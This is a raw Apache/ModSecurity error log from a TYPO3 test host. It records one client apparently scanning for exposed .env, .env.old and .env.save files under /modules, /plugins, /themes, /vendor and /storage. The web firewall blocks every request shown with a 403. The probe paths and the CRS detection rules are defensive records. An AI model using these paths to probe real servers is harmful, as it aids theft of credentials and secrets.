[Sun Nov 16 12:39:48.433336 2025] [:error] [pid 113283] [client 3.8.102.89:47854] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRm4BA0D7yRPJp9gclT4igAAAAM"]
[Sun Nov 16 12:39:48.433516 2025] [:error] [pid 113283] [client 3.8.102.89:47854] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRm4BA0D7yRPJp9gclT4igAAAAM"]
[Sun Nov 16 12:39:48.433713 2025] [:error] [pid 113283] [client 3.8.102.89:47854] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRm4BA0D7yRPJp9gclT4igAAAAM"]
[Sun Nov 16 12:39:48.433887 2025] [:error] [pid 113283] [client 3.8.102.89:47854] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aRm4BA0D7yRPJp9gclT4igAAAAM"]
[Sun Nov 16 12:39:48.453173 2025] [:error] [pid 107823] [client 3.8.102.89:47864] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aRm4BGZlvYqdbt58w-ZoRwAAABA"]
[Sun Nov 16 12:39:48.453377 2025] [:error] [pid 107823] [client 3.8.102.89:47864] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aRm4BGZlvYqdbt58w-ZoRwAAABA"]
[Sun Nov 16 12:39:48.453563 2025] [:error] [pid 107823] [client 3.8.102.89:47864] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aRm4BGZlvYqdbt58w-ZoRwAAABA"]
[Sun Nov 16 12:39:48.461928 2025] [authz_core:error] [pid 107792] [client 3.8.102.89:47862] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/modules
[Sun Nov 16 12:39:48.472197 2025] [:error] [pid 106377] [client 3.8.102.89:47878] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aRm4BM1A9uIKv4_seqC0ZAAAAA4"]
[Sun Nov 16 12:39:48.472395 2025] [:error] [pid 106377] [client 3.8.102.89:47878] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aRm4BM1A9uIKv4_seqC0ZAAAAA4"]
[Sun Nov 16 12:39:48.472566 2025] [:error] [pid 106377] [client 3.8.102.89:47878] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aRm4BM1A9uIKv4_seqC0ZAAAAA4"]
[Sun Nov 16 12:39:48.474167 2025] [:error] [pid 107814] [client 3.8.102.89:47866] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aRm4BIYUzNZoYnjqey4-_AAAAAc"]
[Sun Nov 16 12:39:48.474323 2025] [:error] [pid 107814] [client 3.8.102.89:47866] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aRm4BIYUzNZoYnjqey4-_AAAAAc"]
[Sun Nov 16 12:39:48.474473 2025] [:error] [pid 107814] [client 3.8.102.89:47866] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aRm4BIYUzNZoYnjqey4-_AAAAAc"]
[Sun Nov 16 12:39:48.484781 2025] [:error] [pid 113276] [client 3.8.102.89:47898] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aRm4BLXvaf1IcB4yJOvFAwAAAAU"]
[Sun Nov 16 12:39:48.484920 2025] [:error] [pid 113276] [client 3.8.102.89:47898] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aRm4BLXvaf1IcB4yJOvFAwAAAAU"]
[Sun Nov 16 12:39:48.485073 2025] [:error] [pid 113276] [client 3.8.102.89:47898] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aRm4BLXvaf1IcB4yJOvFAwAAAAU"]
[Sun Nov 16 12:39:48.485213 2025] [:error] [pid 113276] [client 3.8.102.89:47898] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.old"] [unique_id "aRm4BLXvaf1IcB4yJOvFAwAAAAU"]
[Sun Nov 16 12:39:48.487177 2025] [:error] [pid 111778] [client 3.8.102.89:47900] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aRm4BB7OFadbAiGPfqkq0AAAAAI"]
[Sun Nov 16 12:39:48.487323 2025] [:error] [pid 111778] [client 3.8.102.89:47900] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aRm4BB7OFadbAiGPfqkq0AAAAAI"]
[Sun Nov 16 12:39:48.487470 2025] [:error] [pid 111778] [client 3.8.102.89:47900] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aRm4BB7OFadbAiGPfqkq0AAAAAI"]
[Sun Nov 16 12:39:48.490161 2025] [authz_core:error] [pid 113274] [client 3.8.102.89:47882] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vendor
[Sun Nov 16 12:39:48.491491 2025] [:error] [pid 113290] [client 3.8.102.89:47922] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aRm4BH9I9DIP5OQurvpqlwAAAAQ"]
[Sun Nov 16 12:39:48.491651 2025] [:error] [pid 113290] [client 3.8.102.89:47922] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aRm4BH9I9DIP5OQurvpqlwAAAAQ"]
[Sun Nov 16 12:39:48.491812 2025] [:error] [pid 113290] [client 3.8.102.89:47922] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aRm4BH9I9DIP5OQurvpqlwAAAAQ"]
[Sun Nov 16 12:39:48.509630 2025] [authz_core:error] [pid 113296] [client 3.8.102.89:47932] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/plugins
[Sun Nov 16 12:39:48.511131 2025] [:error] [pid 113283] [client 3.8.102.89:47912] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aRm4BA0D7yRPJp9gclT4iwAAAAM"]
[Sun Nov 16 12:39:48.511313 2025] [:error] [pid 113283] [client 3.8.102.89:47912] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aRm4BA0D7yRPJp9gclT4iwAAAAM"]
[Sun Nov 16 12:39:48.511466 2025] [:error] [pid 113283] [client 3.8.102.89:47912] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aRm4BA0D7yRPJp9gclT4iwAAAAM"]
[Sun Nov 16 12:39:48.594112 2025] [:error] [pid 113903] [client 3.8.102.89:47950] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRm4BKK4kxSjhxan99Mk8wAAAAY"]
[Sun Nov 16 12:39:48.594287 2025] [:error] [pid 113903] [client 3.8.102.89:47950] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRm4BKK4kxSjhxan99Mk8wAAAAY"]
[Sun Nov 16 12:39:48.594533 2025] [:error] [pid 113903] [client 3.8.102.89:47950] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRm4BKK4kxSjhxan99Mk8wAAAAY"]
[Sun Nov 16 12:39:48.594716 2025] [:error] [pid 113903] [client 3.8.102.89:47950] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRm4BKK4kxSjhxan99Mk8wAAAAY"]
[Sun Nov 16 12:39:48.596601 2025] [:error] [pid 107823] [client 3.8.102.89:47940] [client 3.8.102.89] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRm4BGZlvYqdbt58w-ZoSAAAABA"]
[Sun Nov 16 12:39:48.596746 2025] [:error] [pid 107823] [client 3.8.102.89:47940] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRm4BGZlvYqdbt58w-ZoSAAAABA"]
[Sun Nov 16 12:39:48.596908 2025] [:error] [pid 107823] [client 3.8.102.89:47940] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRm4BGZlvYqdbt58w-ZoSAAAABA"]
[Sun Nov 16 12:39:48.597070 2025] [:error] [pid 107823] [client 3.8.102.89:47940] [client 3.8.102.89] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aRm4BGZlvYqdbt58w-ZoSAAAABA"]
[Sun Nov 16 12:39:48.606778 2025] [authz_core:error] [pid 107814] [client 3.8.102.89:47960] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/themes
[Sun Nov 16 12:39:53.373107 2025] [:error] [pid 113276] [client 3.8.102.89:47966] [client 3.8.102.89] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aRm4CbXvaf1IcB4yJOvFBAAAAAU"]
[Sun Nov 16 12:39:53.373325 2025] [:error] [pid 113276] [client 3.8.102.89:47966] [client 3.8.102.89] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aRm4CbXvaf1IcB4yJOvFBAAAAAU"]
